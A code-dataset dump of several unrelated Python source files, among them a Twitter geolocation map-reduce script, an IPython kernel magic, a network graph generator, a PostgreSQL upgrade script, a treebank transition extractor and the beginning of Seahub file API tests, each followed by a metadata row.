geo_dict = {}
with open('./testmap_spanish_user.csv', 'wb') as csvfile:
mapwriter = csv.writer(csvfile)
mapwriter.writerow(['user','latitude','longitude','n_loc'])
for doc in geo_stuff.find():
geo_dict['user'] = doc['_id']['user']
value = doc['value']
if 'Geo' in value:
geo_dict['location'] = [value['Geo']]
geo_dict['n_loc'] = 1
elif 'Geo_list' in value:
geo_dict['location'] = value['Geo_list']
geo_dict['n_loc'] = value['n_pts']
geo_data = closest_negighbor(geo_dict)
if geo_data != {}:
mapwriter.writerow([geo_data['user'],geo_data['loc'][0],geo_data['loc'][1], geo_data['n_loc']])
print geo_data
count += 1
print count
# f = open(input_file, "r" )
# with open('./testmap_spanish.csv', 'wb') as csvfile:
# mapwriter = csv.writer(csvfile)
# mapwriter.writerow(['time','latitude','longitude'])
# for each in f:
# tmp = each.split('\t')
# time = datetime.datetime.strptime(tmp[0][0:-5], '%Y-%m-%dT%H:%M:%S')
# geo = tmp[1].strip().split(', ')
# #print time, geo
# row = []
# row.append(time)
# row.append(geo[0])
# row.append(geo[1])
# try:
# mapwriter.writerow(row)
# except:
# mapwriter.writerow([unicode(s).encode("utf-8") for s in row])
if __name__ == '__main__':
client = MongoClient()
db = client.twitter_test
tw_spanish = db.spanish_tweets
mapper = Code("""function () {
emit({user:this.actor.id},{Geo: this.geo.coordinates});
}
"""
)
reducer = Code("""function(key,values) {
var list = [];
var count = 0;
values.forEach(function(value) {
if(value.Geo){
list.push(value.Geo);
count+=1;
}
})
return {Geo_list:list, n_pts:count};
}
"""
)
ifile = './output.txt'
map_points(ifile)
| mit | 6,387,345,091,163,661,000 | 26.066667 | 145 | 0.513547 | false | 3.484979 | false | false | false |
twosigma/beaker-notebook | beakerx/beakerx_magics/kernel_runner_magic.py | 1 | 1420 | # Copyright 2019 TWO SIGMA OPEN SOURCE, LLC #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from IPython import get_ipython
from IPython.core.magic import (magics_class, cell_magic, Magics)
from beakerx_magics import KernelMagics
from ipykernel.zmqshell import ZMQInteractiveShell
@magics_class
class KernelRunnerMagic(Magics):
kernels = {}
def __init__(self, shell):
super(KernelRunnerMagic, self).__init__(shell)
@cell_magic
def kernel(self, line, cell):
if line not in self.kernels:
km = KernelMagics(self.shell)
km.start(line)
self.kernels[line] = km
return self.kernels[line].run_cell(line, cell)
def load_ipython_extension(ipython):
if isinstance(ipython, ZMQInteractiveShell):
ipython.register_magics(KernelRunnerMagic)
if __name__ == '__main__':
ip = get_ipython()
ip.register_magics(KernelRunnerMagic)
| apache-2.0 | 8,582,777,239,791,569,000 | 30.555556 | 74 | 0.709155 | false | 3.796791 | false | false | false |
hsnlab/mapping | generator/networkx_nffg_generator.py | 2 | 4896 | #!/usr/bin/python -u
#
# Copyright (c) 2016 Balazs Nemeth
#
# This file is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
import importlib
import random
import string
from sg_generator import NameGenerator
from generator import NFFG
def get_networkx_func (func_name, seed=0, **kwargs):
"""
Uses 'func_name' graph generator of NetworkX library to create a NetworkX
graph which can be used as topology.
"""
nx_func = getattr(importlib.import_module("networkx"), func_name)
generated_graph = nx_func(seed=seed, **kwargs)
return generated_graph
def networkx_resource_generator (func_name, seed=0, max_cpu=40, max_mem=16000,
max_storage=30, max_link_bw=70,
abc_nf_types_len=10,
supported_nf_cnt=6, max_link_delay=2,
sap_cnt=10,
**kwargs):
"""
Uses a NetworkX graph to create a request NFFG.
:param func_name: string of NetworkX lib's random graph generator function
name
:param seed:
:param max_cpu:
:param max_mem:
:param max_storage:
:param max_link_bw:
:param abc_nf_types_len:
:param supported_nf_cnt:
:param max_link_delay:
:param sap_cnt:
:param kwargs:
:return:
"""
rnd = random.Random()
rnd.seed(seed)
nx_graph = get_networkx_func(func_name, seed=seed, **kwargs)
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
nffg = NFFG(id="net-" + func_name + "-seed" + str(seed))
gen = NameGenerator()
for infra_id in nx_graph.nodes_iter():
infra = nffg.add_infra(id=infra_id,
bandwidth=rnd.random() * max_link_bw * 1000,
cpu=rnd.random() * max_cpu,
mem=rnd.random() * max_mem,
storage=rnd.random() * max_storage)
infra.add_supported_type(rnd.sample(nf_types, supported_nf_cnt))
for i, j in nx_graph.edges_iter():
infra1 = nffg.network.node[i]
infra2 = nffg.network.node[j]
nffg.add_undirected_link(port1=infra1.add_port(id=gen.get_name("port")),
port2=infra2.add_port(id=gen.get_name("port")),
p1p2id=gen.get_name("link"),
p2p1id=gen.get_name("link"),
dynamic=False,
delay=rnd.random() * max_link_delay,
bandwidth=rnd.random() * max_link_bw)
infra_ids = [i.id for i in nffg.infras]
for s in xrange(0, sap_cnt):
sap_obj = nffg.add_sap(id=gen.get_name("sap"))
sap_port = sap_obj.add_port(id=gen.get_name("port"))
infra_id = rnd.choice(infra_ids)
infra = nffg.network.node[infra_id]
nffg.add_undirected_link(port1=sap_port,
port2=infra.add_port(id=gen.get_name("port")),
p1p2id=gen.get_name("link"),
p2p1id=gen.get_name("link"),
dynamic=False,
delay=rnd.random() * max_link_delay,
bandwidth=rnd.uniform(max_link_bw / 2.0,
max_link_bw))
return nffg
def networkx_request_generator (func_name, seed=0, max_cpu=4, max_mem=1600,
max_storage=3, max_link_bw=7,
abc_nf_types_len=10, max_link_delay=2,
sap_cnt=10,
**kwargs):
rnd = random.Random()
rnd.seed(seed)
nx_graph = get_networkx_func(func_name, seed=seed, **kwargs)
nf_types = list(string.ascii_uppercase)[:abc_nf_types_len]
nffg = NFFG(id="req-" + func_name + "-seed" + str(seed))
nffg.mode = NFFG.MODE_ADD
for nf_id in nx_graph.nodes_iter():
nf = nffg.add_nf(id=nf_id, func_type=rnd.choice(nf_types),
cpu=rnd.random() * max_cpu,
mem=rnd.random() * max_mem,
storage=rnd.random() * max_storage)
for i, j in nx_graph.edges_iter():
"""TODO: How to direct the randomly generated graph's edges."""
pass
return nffg
if __name__ == "__main__":
print networkx_resource_generator("erdos_renyi_graph", seed=5, n=6, p=0.3,
sap_cnt=15).dump()
| apache-2.0 | -4,967,591,907,117,210,000 | 35.81203 | 78 | 0.566381 | false | 3.450317 | false | false | false |
mlyundin/Machine-Learning | ex3/ex3.py | 1 | 1834 | import scipy.io as sio
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import minimize
from common_functions import add_zero_feature, cf_lr as cost_function, gf_lr as grad_function, \
cf_lr_reg as cost_function_reg, gf_lr_reg as grad_function_reg
if __name__ == '__main__':
data = sio.loadmat('ex3data1.mat')
y = data['y']
X = data['X']
# replace 10 by 0
y = y % 10
n_sampels = 100
sampels = np.random.choice(len(X), n_sampels)
fig = plt.figure(figsize=(8, 8)) # figure size in inches
fig.subplots_adjust(left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05)
for i, j in enumerate(sampels):
ax = fig.add_subplot(10, 10, i + 1, xticks=[], yticks=[])
ax.imshow(X[j, :].reshape(20, 20).T, cmap=plt.cm.binary, interpolation='nearest')
ax.text(0, 7, str(y[j, 0]))
plt.show()
num_labels = 10
X = add_zero_feature(X)
m, n = X.shape
initial_theta = np.ones((n, 1))
all_theta = np.vstack([minimize(cost_function, initial_theta, method='BFGS', jac=grad_function, options={'disp': True, 'maxiter':100},
args=(X, (y == i).astype(int))).x for i in range(num_labels)])
y_pred = np.argmax(np.dot(X, all_theta.T), axis=1)
print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100)
# Use regularization
lambda_coef = 0.1
all_theta = np.vstack([minimize(cost_function_reg, initial_theta, method='BFGS', jac=grad_function_reg, options={'disp': True, 'maxiter':100},
args=(X, (y == i).astype(int), lambda_coef)).x for i in range(num_labels)])
y_pred = np.argmax(np.dot(X, all_theta.T), axis=1)
print 'Training Set Accuracy: {}'.format(np.mean(y_pred == y.ravel()) * 100) | mit | -2,395,002,424,882,177,000 | 34.72 | 146 | 0.592694 | false | 3.06689 | false | false | false |
proyan/sot-torque-control | python/dynamic_graph/sot/torque_control/identification/identify_motor_static.py | 1 | 5833 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 18:47:50 2017
@author: adelpret
"""
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from identification_utils import solve1stOrderLeastSquare
from dynamic_graph.sot.torque_control.hrp2.control_manager_conf import IN_OUT_GAIN
def identify_motor_static(enc, dq, ctrl, current, tau, JOINT_ID, JOINT_NAME, ZERO_VELOCITY_THRESHOLD,
ZERO_VELOCITY_THRESHOLD_SMALL, SHOW_THRESHOLD_EFFECT):
# remove high velocity
maskConstAng = (abs (dq)<ZERO_VELOCITY_THRESHOLD)
# erode to get only steady phases where velocity is small
maskConstAng=ndimage.morphology.binary_erosion(maskConstAng,None,100)
maskPosVel=(dq> ZERO_VELOCITY_THRESHOLD_SMALL)
maskNegVel=(dq<-ZERO_VELOCITY_THRESHOLD_SMALL)
maskConstPosAng=np.logical_and( maskConstAng ,maskPosVel )
maskConstNegAng=np.logical_and( maskConstAng ,maskNegVel )
if SHOW_THRESHOLD_EFFECT :
plt.figure()
plt.plot(enc, label='q')
q_const=enc.copy()
q_const[np.logical_not(maskConstAng)]=np.nan
plt.plot(q_const, label='q_const')
plt.legend()
# identify current sensor gain
x = current[maskConstAng]
y = ctrl[maskConstAng]/IN_OUT_GAIN
maskPosErr = np.logical_and(y - x > 0.0, np.abs(x)>0.5)
maskNegErr = np.logical_and(y - x < 0.0, np.abs(x)>0.5)
print "Number of samples with constant angle:", x.shape[0]
print "Number of samples with constant angle and pos vel:", x[maskPosErr].shape[0]
print "Number of samples with constant angle and neg vel:", x[maskNegErr].shape[0]
if(x[maskPosErr].shape[0]<10):
(Ks,DZ)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr])
elif(x[maskNegErr].shape[0]<10):
(Ks,DZ)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr])
else:
(Ksn,DZn)=solve1stOrderLeastSquare(x[maskNegErr], y[maskNegErr])
(Ksp,DZp)=solve1stOrderLeastSquare(x[maskPosErr], y[maskPosErr])
Ks = 0.5*(Ksp+Ksn);
Ks = min([Ksp, Ksn]);
DZ = 0.5*(DZp-DZn);
print "Current sensor gains = ", Ksp, Ksn;
print "Deadzones = ", DZp, -DZn;
x_neg = x[maskNegErr]
y_neg = y[maskNegErr]
plt.figure()
plt.plot(x_neg, y_neg,'.' ,lw=3,markersize=1,c='0.5');
plt.plot([min(x_neg),max(x_neg)],[Ksn*min(x_neg)+DZn ,Ksn*max(x_neg)+DZn],'g:',lw=3)
plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$')
plt.title('Negative current errors - Joint '+JOINT_NAME)
x_pos = x[maskPosErr]
y_pos = y[maskPosErr]
plt.figure()
plt.plot(x_pos, y_pos,'.' ,lw=3,markersize=1,c='0.5');
plt.plot([min(x_pos),max(x_pos)],[Ksp*min(x_pos)+DZp ,Ksp*max(x_pos)+DZp],'g:',lw=3)
plt.ylabel(r'$i(t)$'); plt.xlabel(r'$u(t)$')
plt.title('Positive current errors - Joint '+JOINT_NAME)
plt.show()
if(Ks<0.0):
print "ERROR: estimated Ks is negative! Setting it to 1"
Ks = 1.0;
# plot dead zone effect ********************************************
plt.figure()
plt.plot(Ks*current, label='current')
plt.plot(ctrl/IN_OUT_GAIN, label='control')
plt.legend()
plt.figure()
y = Ks*current[maskConstAng]
x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng]
plt.ylabel(r'$i(t)$')
plt.xlabel(r'$ctrl(t)-i(t)$')
plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5');
plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err');
plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err');
plt.legend()
plt.figure()
y = ctrl[maskConstAng]/IN_OUT_GAIN
x = ctrl[maskConstAng]/IN_OUT_GAIN - Ks*current[maskConstAng]
plt.ylabel(r'$ctrl(t)$')
plt.xlabel(r'$ctrl(t)-i(t)$')
plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5');
plt.plot(x[maskPosErr],y[maskPosErr],'rx',lw=3,markersize=1, label='pos err');
plt.plot(x[maskNegErr],y[maskNegErr],'bx',lw=3,markersize=1, label='neg err');
plt.legend()
plt.figure()
y = ctrl/IN_OUT_GAIN
x = Ks*current
plt.ylabel(r'$ctrl(t)$')
plt.xlabel(r'$i(t)$')
plt.plot(x,y,'.' ,lw=3,markersize=1,c='0.5');
plt.plot([-3,3],[-3,3]);
plt.show()
# y = a. x + b
# i = Kt.tau + Kf
# Identification ***************************************************
y = current #*Ks
x = tau
(Ktp,Kfp)=solve1stOrderLeastSquare(x[maskConstPosAng],y[maskConstPosAng])
(Ktn,b)=solve1stOrderLeastSquare(x[maskConstNegAng],y[maskConstNegAng])
Kfn=-b
# Plot *************************************************************
plt.figure()
plt.axhline(0, color='black',lw=1)
plt.axvline(0, color='black',lw=1)
plt.plot(x ,y ,'.' ,lw=3,markersize=1,c='0.5');
plt.plot(x[maskConstPosAng],y[maskConstPosAng],'rx',lw=3,markersize=1);
plt.plot(x[maskConstNegAng],y[maskConstNegAng],'bx',lw=3,markersize=1);
#plot identified lin model
plt.plot([min(x),max(x)],[Ktp*min(x)+Kfp ,Ktp*max(x)+Kfp],'g:',lw=3)
plt.plot([min(x),max(x)],[Ktn*min(x)-Kfn ,Ktn*max(x)-Kfn],'g:',lw=3)
plt.ylabel(r'$i(t)$')
plt.xlabel(r'$\tau(t)$')
plt.title('Static experiment - Joint '+JOINT_NAME)
print "cur_sens_gain[%d] = %f" % (JOINT_ID, Ks);
print 'deadzone[%d] = %f' % (JOINT_ID, DZ);
print 'Kt_p[%d] = %f' % (JOINT_ID,Ktp);
print 'Kt_n[%d] = %f' % (JOINT_ID,Ktn);
print 'Kf_p[%d] = %f' % (JOINT_ID,Kfp);
print 'Kf_n[%d] = %f' % (JOINT_ID,Kfn);
print 'Kt_m[%d] = %f' % (JOINT_ID,(Ktp+Ktn)/2.0);
print 'Kf_m[%d] = %f' % (JOINT_ID,(Kfp+Kfn)/2.0);
return (Ktp, Ktn, Ks, DZ); | gpl-3.0 | 1,240,813,674,669,772,500 | 39.797203 | 102 | 0.572947 | false | 2.683073 | false | false | false |
sassoftware/mint | mint/scripts/postgres_auto_update.py | 1 | 7720 | #
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Shut down PostgreSQL, check if it needs updating, then start it again.
"""
import logging
import optparse
import os
import signal
import subprocess
import tempfile
import time
import traceback
from conary.lib import cfg as cfgmod
from conary.lib import cfgtypes
from conary.lib import util as cny_util
from mint import config
from mint.scripts import postgres_major_migrate
log = logging.getLogger('auto_update')
class PostgresMeta(cfgmod.ConfigFile):
version = cfgtypes.CfgString
binDir = cfgtypes.CfgPath
dataDir = cfgtypes.CfgPath
class Script(postgres_major_migrate.Script):
logFileName = 'scripts.log'
newLogger = True
port = 5439
user = 'postgres'
dataTop = '/srv/pgsql'
currentMetaPath = '/srv/rbuilder/data/postgres-meta'
nextMetaPath = '/usr/share/rbuilder/postgres-meta'
def action(self):
parser = optparse.OptionParser()
parser.add_option('-c', '--config-file',
default=config.RBUILDER_CONFIG)
parser.add_option('-q', '--quiet', action='store_true')
parser.add_option('--init', action='store_true')
options, args = parser.parse_args()
self.loadConfig(options.config_file)
self.resetLogging(quiet=options.quiet)
currentMeta = self.getCurrentMeta()
nextMeta = self.getNextMeta()
if currentMeta and currentMeta.dataDir == nextMeta.dataDir:
return 0
self.stopPostgres()
if not currentMeta:
self.initdb(nextMeta)
else:
self.migrateMeta(currentMeta, nextMeta)
self.startPostgres()
def stopPostgres(self):
"""Kill postgres by checking its UNIX socket."""
log.info("Stopping PostgreSQL on port %s", self.port)
sockPath = '/tmp/.s.PGSQL.%s' % self.port
# Send progressively more aggressive sigals until it dies.
signals = ([signal.SIGINT] * 4
) + ([signal.SIGQUIT] * 2
) + [signal.SIGKILL]
while signals:
if not os.path.exists(sockPath):
return
signum = signals.pop(0)
if not self._stopPostgres(sockPath, signum):
# No process is listening on that socket.
return
sleepUntil = time.time() + 15
while time.time() < sleepUntil:
if not os.path.exists(sockPath):
return
time.sleep(0.1)
@staticmethod
def _stopPostgres(sockPath, signal):
# Use netstat to figure out what processes own the socket.
netstat = subprocess.Popen(['netstat', '-lpnxT'],
shell=False, stdout=subprocess.PIPE).communicate()[0]
found = False
for line in netstat.splitlines():
words = line.split()
if sockPath not in words:
continue
i = words.index(sockPath)
process = words[i-1]
pid, name = process.split('/')
if name not in ('postmaster', 'postgres'):
continue
os.kill(int(pid), signal)
found = True
return found
def getCurrentMeta(self):
"""Get metadata about the current PostgreSQL cluster."""
cfg = PostgresMeta()
if os.path.exists(self.currentMetaPath):
cfg.read(self.currentMetaPath)
return cfg
# rBuilder <= 5.8.0 doesn't have a meta file. Use the highest-numbered
# datadir as the "current" cluster.
if not os.path.isdir(self.dataTop):
return None
versions = []
for name in os.listdir(self.dataTop):
if name[-9:] != '-rbuilder':
continue
path = os.path.join(self.dataTop, name)
version = name[:-9]
try:
parts = [int(x) for x in version.split('.')]
except ValueError:
continue
versions.append((parts, version, path))
if not versions:
# No postgres data dir found.
return None
versions.sort()
_, cfg.version, cfg.dataDir = versions[-1]
cfg.binDir = '/opt/postgresql-%s/bin' % (cfg.version,)
cfg.writeToFile(self.currentMetaPath, includeDocs=False)
return cfg
def getNextMeta(self):
"""Get metadata about the version of PostgreSQL that will be used after
the (possible) upgrade.
"""
cfg = PostgresMeta()
cfg.read(self.nextMetaPath)
return cfg
def updateMeta(self, nextMeta):
"""Update the "current" metadata file."""
nextMeta.writeToFile(self.currentMetaPath, includeDocs=False)
def initdb(self, meta):
"""Create a new postgres cluster at the given location."""
log.info("Initializing PostgreSQL %s cluster", meta.version)
assert not os.path.exists(meta.dataDir)
self.loadPrivs(user=self.user)
parentDir = os.path.dirname(meta.dataDir)
if not os.path.isdir(parentDir):
os.makedirs(parentDir)
tempDir = tempfile.mkdtemp(dir=parentDir)
try:
os.chown(tempDir, self.uidgid[0], self.uidgid[1])
self.dropPrivs()
cluster = postgres_major_migrate.Postmaster(dataDir=tempDir,
binDir=meta.binDir, port=65000,
logPath='/tmp/postgres-initdb.log')
cluster.initdb()
self.restorePrivs()
self.updateMeta(meta)
os.rename(tempDir, meta.dataDir)
finally:
try:
if os.path.isdir(tempDir):
try:
self.restorePrivs()
except:
traceback.print_exc()
log.info("Cleaning up temporary target dir")
cny_util.rmtree(tempDir)
except:
traceback.print_exc()
def migrateMeta(self, currentMeta, nextMeta):
"""Migrate postgres cluster to a new version and datadir."""
log.info("Migrating PostgreSQL from %s to %s", currentMeta.version,
nextMeta.version)
assert currentMeta.dataDir != nextMeta.dataDir
if os.path.exists(nextMeta.dataDir):
# Nuke any existing data directory -- either an explicit meta file
# told us that a different datadir is in use, or the heuristic
# decided there was nothing of value in this one.
cny_util.rmtree(nextMeta.dataDir)
self.runMigration(
from_bindir=currentMeta.binDir,
from_datadir=currentMeta.dataDir,
from_port=None,
to_bindir=nextMeta.binDir,
to_datadir=nextMeta.dataDir,
user=self.user,
)
self.updateMeta(nextMeta)
os.rename(currentMeta.dataDir, currentMeta.dataDir + '.old')
def startPostgres(self):
os.system("/sbin/service postgresql-rbuilder start")
cluster = postgres_major_migrate.DummyCluster(self.port, user=self.user)
cluster.waitForPostgres()
| apache-2.0 | -2,299,280,373,432,593,200 | 33.618834 | 80 | 0.595337 | false | 4.15277 | true | false | false |
wmaier/treetools | trees/transitions.py | 1 | 9924 | """treetools: Tools for transforming treebank trees.
This module provides functions and classes for transition extraction.
Author: Wolfgang Maier <[email protected]>
"""
import argparse
import sys
from . import trees, treeinput, transform
from . import misc, transitionoutput
class Transition():
def __init__(self, name):
self.name = name
def pretty_print(self):
return self.name
def __str__(self):
return self.name
def topdown(tree):
"""Extract transitions topdown for continuous trees.
"""
terminals = [(terminal.data['word'], terminal.data['label'])
for terminal in trees.terminals(tree)]
transitions = []
for node in trees.preorder(tree):
children = trees.children(node)
if len(children) == 0:
transitions.append(Transition("SHIFT"))
elif len(children) == 1:
transitions.append(Transition("UNARY-%s" % node.data["label"]))
elif len(children) == 2:
if 'head' not in children[0].data:
raise ValueError("heads are supposed to be marked")
headside = "LEFT" if children[0].data['head'] else "RIGHT"
transitions.append(Transition("BINARY-%s-%s" %
(headside, node.data["label"])))
else:
raise ValueError("trees must be binarized")
print(terminals, [str(t)
for t in list(reversed(transitions))], file=sys.stderr)
return terminals, list(reversed(transitions))
def _inorder(tree):
"""Recursive inorder transition
"""
transitions = []
c = trees.children(tree)
if len(trees.children(c[0])) == 0:
transitions.append(Transition("SHIFT"))
else:
transitions.extend(_inorder(c[0]))
transitions.append(Transition("PJ-{}".format(tree.data['label'])))
for child in c[1:]:
if len(trees.children(child)) == 0:
transitions.append(Transition("SHIFT"))
else:
transitions.extend(_inorder(child))
transitions.append(Transition("REDUCE"))
return transitions
def inorder(tree):
"""Extract inorder transitions for continuous trees.
"""
terminals = [(terminal.data['word'], terminal.data['label'])
for terminal in trees.terminals(tree)]
transitions = _inorder(tree)
return terminals, transitions
def gap(tree):
"""GAP transition parsing (Coavoux & Crabbe)
"""
terminals = [(terminal.data['word'], terminal.data['label'])
for terminal in trees.terminals(tree)]
transitions = []
b = [terminal for terminal in trees.terminals(tree)]
d = []
s = []
while True:
if len(s) > 0 and len(d) > 0 and d[0].parent == s[0].parent:
# REDUCE
p = s[0].parent
if 'head' not in s[0].data or 'head' not in d[0].data:
raise ValueError("heads are supposed to be marked")
headside = "LEFT" if s[0].data['head'] else "RIGHT"
t = Transition("R-{}-{}".format(headside, p.data['label']))
transitions.append(t)
s = s[1:]
d = d[1:]
while len(d) > 0:
s = [d.pop(0)] + s
d = [p] + d
elif len(d) > 0 and any([n.parent == d[0].parent for i,n in enumerate(s)]):
# GAP
for i, n in enumerate(s):
if n.parent == d[0].parent:
for j in range(i):
d.append(s.pop(0))
t = Transition("GAP")
transitions.append(t)
break
else:
t = Transition("SHIFT")
transitions.append(t)
while len(d) > 0:
s = [d.pop(0)] + s
d = [b.pop(0)] + d
if len(s) == 0 and len(b) == 0 and len(d) == 1:
break
# check for unary
while len(d) > 0 and d[0].parent and len(trees.children(d[0].parent)) == 1:
t = Transition("UNARY-{}".format(d[0].parent.data['label']))
transitions.append(t)
d[0] = d[0].parent
return terminals, transitions
def add_parser(subparsers):
"""Add an argument parser to the subparsers of treetools.py.
"""
parser = subparsers.add_parser('transitions',
usage='%(prog)s src dest '
'transtype [options] ',
formatter_class=argparse.
RawDescriptionHelpFormatter,
description='transition extraction from'
' treebank trees')
parser.add_argument('src', help='input file')
parser.add_argument('dest', help='prefix of output files')
parser.add_argument('transtype', metavar='T', choices=[t for t in TRANSTYPES],
help='type of transitions (default: %(default)s)',
default='topdown')
parser.add_argument('--transform', metavar='TS', choices=[fun.__name__ for fun in
transform.TRANSFORMATIONS],
nargs='+',
help='tree transformations to apply before extraction',
default=[])
parser.add_argument('--transformparams', metavar='TSP',
nargs='+', help='tree transformations parameters',
default=[])
parser.add_argument('--src-format', metavar='FMT',
choices=[fun.__name__
for fun in treeinput.INPUT_FORMATS],
help='input format (default: %(default)s)',
default='export')
parser.add_argument('--src-enc', metavar='ENCODING',
help='input encoding (default: %(default)s)',
default='utf-8')
parser.add_argument('--src-opts', nargs='+', metavar='O',
help='space separated list of options O for reading '
'input of the form key:value '
'(default: %(default)s)',
default=[])
parser.add_argument('--dest-format', metavar='FMT',
help='grammar format (default: %(default)s)',
default='plain')
parser.add_argument('--dest-enc', metavar='ENCODING',
help='grammar encoding (default: %(default)s)',
default='utf-8')
parser.add_argument('--dest-opts', nargs='+', metavar='O',
help='space separated list of options O for writing '
'the transitions of the form key:value '
'(default: %(default)s)',
default=[])
parser.add_argument('--verbose', action='store_true', help='More verbose '
'messages', default=False)
parser.add_argument('--usage', nargs=0, help='show detailed information '
'about available tasks and input format/options',
action=UsageAction)
parser.set_defaults(func=run)
return parser
class UsageAction(argparse.Action):
"""Custom action which shows extended help on available options.
"""
def __call__(self, parser, namespace, values, option_string=None):
title_str = misc.bold("{} help".format(sys.argv[0]))
help_str = "\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}\n\n{}\n{}".\
format(misc.make_headline("available transition types:"), misc.get_doc_opts(TRANSTYPES),
misc.make_headline("available tree input formats:"), misc.get_doc(treeinput.INPUT_FORMATS),
misc.make_headline("available tree input opts:"), misc.get_doc_opts(treeinput.INPUT_OPTIONS),
misc.make_headline("available output formats:"), misc.get_doc(transitionoutput.FORMATS),
misc.make_headline("available output opts:"), misc.get_doc_opts(transitionoutput.FORMAT_OPTIONS))
print("\n%s%s" % (title_str, help_str))
sys.exit()
def run(args):
"""Run the transition extraction.
"""
print("reading from '%s' in format '%s' and encoding '%s'"
% (args.src, args.src_format, args.src_enc), file=sys.stderr)
tree_inputformats = [fun.__name__ for fun in treeinput.INPUT_FORMATS]
transitions = []
if args.src_format in tree_inputformats:
print("extracting transitions (%s)" % args.transtype, file=sys.stderr)
cnt = 1
for tree in getattr(treeinput,
args.src_format)(args.src, args.src_enc,
**misc.options_dict
(args.src_opts)):
for algorithm in args.transform:
print(algorithm)
tree = getattr(transform, algorithm)(
tree, **misc.options_dict(args.transformparams))
sentence, trans = globals()[args.transtype](tree)
transitions.append((sentence, trans))
if cnt % 100 == 0:
print("\r%d" % cnt, end="", file=sys.stderr)
cnt += 1
else:
raise ValueError("Specify input format %s" % args.src_format)
print("\n", file=sys.stderr)
sys.stderr.write("\nwriting transitions in format '%s', encoding '%s', to '%s'"
% (args.dest_format, args.dest_enc, args.dest))
sys.stderr.write("\n")
getattr(transitionoutput, args.dest_format)(transitions, args.dest, args.dest_enc,
**misc.options_dict(args.dest_opts))
print("\n", file=sys.stderr)
sys.exit()
TRANSTYPES = {'topdown': 'Top-down continuous',
'inorder': 'Inorder continuous',
'gap': 'Gap discontinuous'}
| gpl-3.0 | -8,439,954,189,976,804,000 | 41.410256 | 113 | 0.531036 | false | 4.279431 | false | false | false |
saukrIppl/seahub | tests/api/test_files.py | 1 | 12451 | #coding: UTF-8
"""
Test file/dir operations.
"""
import posixpath
import pytest
import urllib
from urllib import urlencode, quote
import urlparse
from tests.common.utils import randstring, urljoin
from tests.api.apitestbase import ApiTestBase
class FilesApiTest(ApiTestBase):
def test_rename_file(self):
with self.get_tmp_repo() as repo:
name, furl = self.create_file(repo)
data = {
'operation': 'rename',
'newname': name + randstring(),
}
res = self.post(furl, data=data)
self.assertRegexpMatches(res.text, r'"http(.*)"')
def test_remove_file(self):
with self.get_tmp_repo() as repo:
_, furl = self.create_file(repo)
res = self.delete(furl)
self.assertEqual(res.text, '"success"')
def test_move_file(self):
with self.get_tmp_repo() as repo:
_, furl = self.create_file(repo)
# TODO: create another repo here, and use it as dst_repo
data = {
'operation': 'move',
'dst_repo': repo.repo_id,
'dst_dir': '/',
}
res = self.post(furl, data=data)
self.assertEqual(res.text, '"success"')
def test_copy_file(self):
with self.get_tmp_repo() as repo:
# TODO: create another repo here, and use it as dst_repo
# create sub folder(dpath)
dpath, _ = self.create_dir(repo)
# create tmp file in sub folder(dpath)
tmp_file = 'tmp_file.txt'
file_path = dpath + '/' + tmp_file
furl = repo.get_filepath_url(file_path)
data = {'operation': 'create'}
res = self.post(furl, data=data, expected=201)
# copy tmp file from sub folder(dpath) to dst dir('/')
data = {
'dst_repo': repo.repo_id,
'dst_dir': '/',
'operation': 'copy',
}
u = urlparse.urlparse(furl)
parsed_furl = urlparse.urlunparse((u.scheme, u.netloc, u.path, '', '', ''))
res = self.post(parsed_furl+ '?p=' + quote(file_path), data=data)
self.assertEqual(res.text, '"success"')
# get info of copied file in dst dir('/')
fdurl = repo.file_url + u'detail/?p=/%s' % quote(tmp_file)
detail = self.get(fdurl).json()
self.assertIsNotNone(detail)
self.assertIsNotNone(detail['id'])
def test_download_file(self):
with self.get_tmp_repo() as repo:
fname, furl = self.create_file(repo)
res = self.get(furl)
self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname))
def test_download_file_without_reuse_token(self):
with self.get_tmp_repo() as repo:
fname, furl = self.create_file(repo)
res = self.get(furl)
self.assertRegexpMatches(res.text, '"http(.*)/%s"' % quote(fname))
# download for the first time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 200)
# download for the second time
url = urllib.urlopen(res.text.strip('"'))
code = url.getcode()
self.assertEqual(code, 400)
def test_download_file_with_reuse_token(self):
with self.get_tmp_repo() as repo:
fname, furl = self.create_file(repo)
